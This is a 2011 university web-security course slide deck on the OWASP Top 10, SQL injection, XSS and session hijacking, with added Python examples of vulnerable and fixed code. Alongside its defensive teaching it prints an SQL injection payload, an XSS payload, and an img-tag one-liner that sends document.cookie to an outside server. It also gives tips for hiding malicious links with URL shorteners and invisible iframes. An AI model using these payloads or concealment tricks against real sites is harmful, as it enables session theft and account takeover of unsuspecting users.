Don't Get Caught! - National Central University Computer Center

Uploaded by arghtalent, Jan 31, 2013

National Central University Computer Center

"Multimedia and Network Applications" IT outreach course

Introduction to Web Application Security

Date: 2011/03/27

Instructor: 張竟, third-year Computer Science undergraduate

cwebb [dot] tw [at] gmail [dot] com

Agenda

Preamble

OWASP Top 10

SQL injection

XSS

cookie & session


Don't do bad things!

Don't get caught!

Don't say I taught you.


Web security?

Early days vs. today

Static vs. dynamic

Where there is code, there are vulnerabilities!

Ways to attack

OS

web server

web application

Attack scenarios

attack the web server
  gain privilege
  steal information
  use it to attack users

attack other users
  steal information
  execute other attacks

attacks may be composite


OWASP Top 10 - 2010

A1: Injection

A2: Cross-Site Scripting (XSS)

A3: Broken Authentication and Session Management

A4: Insecure Direct Object References

A5: Cross-Site Request Forgery (CSRF)

A6: Security Misconfiguration

A7: Insecure Cryptographic Storage

A8: Failure to Restrict URL Access

A9: Insufficient Transport Layer Protection

A10: Unvalidated Redirects and Forwards



Injections

The hacker's fill-in-the-blank game

Where can an attacker inject?

  database (MySQL, MS SQL, PostgreSQL ...)

  NoSQL

  Directory Service (LDAP)

  system commands!!

How SQL works on the web

A login page, for example:

client -> web server -> SQL server

Why SQL?

Widely used

Stores large amounts of site data

Injection friendly

How do injections work?

Using MySQL as the example:

$query = "select * from account where `id`='$id' and `pwd`='$pwd'";

$id = ' or 1=1 --

> select * from account where `id`='' or 1=1 -- ' and `pwd`='...'

....

Attack skills

union

blind attack

Impact

Data stolen / modified

Attacker gains privileges on the site

The whole site is taken over

How to defend

Use a safe API

Filter / escape special characters

Never put user input directly into the query

Use a scanner to find vulnerabilities
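The login query from the slides above, built both ways, as an added example that is not part of the original deck. It uses an in-memory SQLite table as a stand-in for MySQL, and the account row is constructed sample data; `login_vulnerable` pastes input into the SQL string, `login_safe` is the "safe API" (parameter binding) the defense slide recommends.

```python
# Added example, not from the original slides: the same login query built two
# ways. sqlite3 stands in for MySQL so the block runs stand-alone.
import sqlite3


def make_db():
    """Constructed sample data: one account table with a single user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE account (id TEXT, pwd TEXT)")
    conn.execute("INSERT INTO account VALUES ('alice', 'correct horse')")
    return conn


def login_vulnerable(conn, user_id, pwd):
    """User input pasted straight into the SQL string, as on the slide."""
    query = f"select * from account where id='{user_id}' and pwd='{pwd}'"
    return conn.execute(query).fetchone() is not None


def login_safe(conn, user_id, pwd):
    """Same query through the driver's parameter binding (the 'safe API').

    The driver sends the values separately from the SQL text, so quotes and
    comment markers in the input can never change the query's structure."""
    query = "select * from account where id=? and pwd=?"
    return conn.execute(query, (user_id, pwd)).fetchone() is not None


if __name__ == "__main__":
    conn = make_db()
    payload = "' or 1=1 --"  # the slide's fill-in-the-blank input
    # The tautology makes the WHERE clause always true; the comment marker
    # discards the password check, so the vulnerable version "logs in".
    print(login_vulnerable(conn, payload, "anything"))  # True
    print(login_safe(conn, payload, "anything"))        # False
```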

Practice


XSS

Cross Site Scripting

Writing code on someone else's website!

Background knowledge

HTTP GET

HTTP POST

How to attack

attack using POST/GET

the "scripting" is served from the server's own page

strange URL

JavaScript

<iframe> / <image>

Example

<body>
<?php echo "Hello " . $_GET['id']; ?>
</body>

http://goodsite.com/?id=<script>alert("i'm Orange")</script>

What may happen?

Take you to a bad site

Send your information to the attacker

Just For Fun!

Just For Fun: Samy

MySpace XSS attack

"Samy is my hero!"

Infection

Big sites are also XSSable

MySpace

Facebook

twitter

Plurk

...

How to defend

for the server

  what must be escaped still has to be escaped

  use a scanner to find vulnerabilities

for the user

  be alert when you see a strange link

  browser / antivirus software
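The "Hello" page from the XSS example slide, rendered with and without the output escaping the defense slide calls for, as an added example that is not part of the original deck. `render_vulnerable` mirrors the slide's PHP echo; `render_escaped` uses Python's `html.escape`, and `contains_script` is a crude helper added only to make the difference checkable.

```python
# Added example, not from the original slides: the reflected "Hello <id>" page
# with and without output escaping.
import html
import re

# Crude detector used only to make the difference between the two renderers
# testable; it is not a real XSS filter.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_vulnerable(user_id):
    """Echoes the query parameter into the HTML body unchanged, like the
    slide's PHP: any markup in the parameter becomes part of the page."""
    return f"<body>Hello {user_id}</body>"


def render_escaped(user_id):
    """Escapes &, <, >, and both quote characters so the parameter is shown
    as text. The browser still displays the original characters."""
    return f"<body>Hello {html.escape(user_id, quote=True)}</body>"


def contains_script(page):
    """True if the rendered page carries a raw <script> tag."""
    return SCRIPT_TAG.search(page) is not None


if __name__ == "__main__":
    payload = '<script>alert("i\'m Orange")</script>'  # the slide's payload
    print(render_vulnerable(payload))  # tag survives into the page
    print(render_escaped(payload))     # rendered as &lt;script&gt;...
```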

Practice


Background knowledge

cookie

session

A cookie is a piece of text stored by a user's web browser. A cookie can be used for authentication, storing site preferences, shopping cart contents, the identifier for a server-based session, or anything else that can be accomplished through storing text data.

The session information is stored on the web server using the session identifier (session ID) generated as a result of the first (sometimes the first authenticated) request from the end user running a web browser. The "storage" of session IDs and the associated session data (user name, account number, etc.) on the web server is accomplished using a variety of techniques including, but not limited to: local memory, flat files, and databases.

If you get hold of the cookie, you can....

How to steal it?


Send the cookie off to the cloud!

Use GET / POST to make the page send the cookie away

<img> / <iframe>

ex: ["<img src='http://in1.ncu.cc/~975002063/keke/t.php?t=", document.cookie, "'>"].join()

The server side is simple: just keep the cookie

Which idiot would click a ghastly link like this?


Hidden

There is a thing called URL shorteners (tinyurl.com / 0rz.tw / goo.gl / bit.ly)

Stuff it into another page (ex: an iframe with width and height set to 0 or 1)

Ugly URLs are EVERYWHERE:

https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1eic6yu9oa4y3&scc=1&ltmpl=default&ltmplcache=2

https://login.yahoo.com/config/login?.intl=tw&.pd=c%3d7pP3Kh2p2e4XklntZWWfDLAC8w--&.done=https://tw.login.yahoo.com/cgi-bin/kcookie.cgi/www/http%3a//tw.yahoo.com&rl=1

Prevention

Pin the session to the user agent / header

Pin the session to the IP

* Don't let the attack succeed in the first place *

Pin the session to the user agent / header

<?php
session_start();
if (isset($_SESSION['HTTP_USER_AGENT'])) {
    // Fingerprint mismatch: the session id is being used from a different client
    if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT'])) {
        exit();
    }
} else {
    // First request: remember the client's user agent for this session
    $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);
}
?>

But... if you can steal the cookie, can't you get the header too?
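The user-agent pinning check from the PHP snippet above, rewritten in Python over a plain dict standing in for `$_SESSION`, together with the caveat the slide raises, as an added example that is not part of the original deck. It assumes SHA-256 in place of the slide's md5 and a constructed user-agent string and session id; the scenario shows why the check only blocks a replay from a client that sends a different header.

```python
# Added example, not from the original slides: session-to-user-agent pinning
# and its limit. A dict stands in for $_SESSION; SHA-256 replaces md5.
import hashlib


def ua_fingerprint(user_agent):
    """Hash of the header value; SHA-256 here where the slide uses md5."""
    return hashlib.sha256(user_agent.encode()).hexdigest()


def check_session(session, user_agent):
    """Return True if the request may proceed, False where the slide's exit()
    would fire. session is a dict keyed like $_SESSION and is updated in
    place on the first request."""
    fp = ua_fingerprint(user_agent)
    if "HTTP_USER_AGENT" in session:
        return session["HTTP_USER_AGENT"] == fp
    session["HTTP_USER_AGENT"] = fp
    return True


def simulate():
    """Constructed scenario: victim logs in, then the stolen session id is
    replayed twice. Returns the three check outcomes in order."""
    victim_ua = "Mozilla/5.0 (Windows NT 6.1) Firefox/4.0"  # constructed value
    server_sessions = {"abc123": {}}                         # session id -> data
    # Victim's first request establishes the fingerprint.
    first = check_session(server_sessions["abc123"], victim_ua)
    # Replay from a client that sends a different User-Agent: blocked.
    other_client = check_session(server_sessions["abc123"], "curl/7.0")
    # Replay that sends the victim's exact header: the header is not secret,
    # so the check passes. This is the slide's "can't you get the header too?"
    same_ua = check_session(server_sessions["abc123"], victim_ua)
    return first, other_client, same_ua


if __name__ == "__main__":
    print(simulate())  # (True, False, True)
```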

Practice

Q&A?

Reference

http://www.owasp.org/

http://en.wikipedia.org/

http://goo.gl/cA3a

http://goo.gl/IwGbX

http://goo.gl/uQ4I1